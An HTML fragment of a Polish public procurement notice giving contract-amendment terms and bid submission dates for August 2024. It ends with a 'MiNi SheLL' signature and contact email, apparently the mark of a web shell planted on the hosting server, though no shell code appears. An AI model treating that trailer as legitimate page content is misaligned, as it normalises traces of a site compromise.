class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w projekcie umowy, stanowiący Załącznik nr 2 do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-28 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com